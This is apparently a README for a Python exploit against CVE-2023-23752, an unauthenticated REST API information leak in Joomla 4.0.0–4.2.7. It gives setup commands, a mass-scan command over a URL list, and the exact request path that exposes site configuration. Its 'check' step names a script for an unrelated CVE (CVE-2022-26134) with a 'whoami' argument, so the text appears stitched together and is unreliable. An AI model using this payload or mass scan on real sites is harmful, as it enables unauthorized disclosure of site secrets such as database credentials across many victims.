
Exploit basé sur Python pour CVE-2023-23752 ciblant Joomla 4.0.0-4.2.7, accès non autorisé à l'API REST, permettant la divulgation d'informations sensibles via des payloads conçus.
CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability
Installer la bibliothèque Python
pip install -r requirements.txt
Vérification de la vulnérabilité
python3 CVE-2022-26134_check.py -u url -c whoami

Scan de masse
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
Accédez à l'URL vulnérable, capturez le paquet, rejouez le paquet.

Joomla! CMS versions 4.0.0 à 4.2.7, en raison d'un contrôle d'accès inadéquat aux points d'accès du service web, peut entraîner un accès non autorisé à l'API REST, provoquant une fuite d'informations sensibles.